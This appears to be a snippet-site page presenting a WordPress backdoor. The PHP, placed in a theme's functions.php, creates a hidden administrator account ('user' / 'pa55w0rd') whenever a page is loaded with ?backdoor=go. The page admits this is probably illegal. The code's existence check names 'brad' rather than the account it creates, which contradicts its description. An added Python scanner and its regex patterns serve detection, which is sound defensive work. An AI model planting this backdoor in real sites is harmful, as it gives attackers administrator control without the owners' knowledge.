Backdoor in WordPress


Description: 

The following is probably illegal and should be used only with utmost caution.

Simply place the code in the PHP section in your theme's functions.php file and upload it to your web server.

To activate this code, simply visit http://example.com?backdoor=go

When triggered, the code will create a new administrator account with the username ‘user’ and password ‘pa55w0rd’. The function also verifies the user account doesn’t exist first before creating it.




Kind:

PHP


PHP:

add_action('wp_head', 'my_backdoor');
 
function my_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('brad')) {
            $user_id = wp_create_user('user', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
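
For site owners auditing a theme directory for this pattern, here is an added detection example (not part of the original snippet): a Python scanner that flags PHP files combining user creation with an administrator role assignment, and reports whether a request parameter is also read. The indicator names, function names and both sample strings are constructed for this example.

```python
import re
from pathlib import Path

# Indicators taken from the snippet on this page; names and grouping are this example's own.
INDICATORS = {
    "request_gate": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
    "user_creation": re.compile(r"\bwp_(create|insert)_user\s*\(", re.I),
    "admin_role": re.compile(
        r"set_role\s*\(\s*['\"]administrator['\"]|['\"]role['\"]\s*=>\s*['\"]administrator['\"]", re.I),
}

def strip_comments(php):
    """Drop /* */ blocks and whole-line // or # comments so dead code does not match."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(//|#).*$", "", php)

def scan_source(php):
    """Return the sorted names of the indicators present in live PHP code."""
    code = strip_comments(php)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(code))

def is_suspicious(php):
    """Flag code that both creates a user and assigns the administrator role."""
    hits = scan_source(php)
    return "user_creation" in hits and "admin_role" in hits

def scan_themes(root):
    """Walk a directory (e.g. wp-content/themes) and map flagged files to their indicators."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(errors="replace")
        if is_suspicious(text):
            findings[str(path)] = scan_source(text)
    return findings

# Constructed sample mirroring the shape of the snippet on this page.
SAMPLE_BACKDOOR = """add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        $user_id = wp_create_user('user', 'pa55w0rd');
        $user = new WP_User($user_id);
        $user->set_role('administrator');
    }
}"""
# Constructed benign theme code: reads a query parameter, creates no users.
SAMPLE_BENIGN = """// wp_create_user('demo', 'x'); $u->set_role('administrator');
add_action('after_setup_theme', 'mytheme_setup');
$q = isset($_GET['s']) ? sanitize_text_field($_GET['s']) : '';"""
```

A match is a prompt to review the file and the site's list of administrator accounts, since plugins that legitimately provision users will also match. Obfuscated code (encoded strings, dynamic function names) will not match these patterns, so pair the scan with file-integrity comparison against the theme's original release.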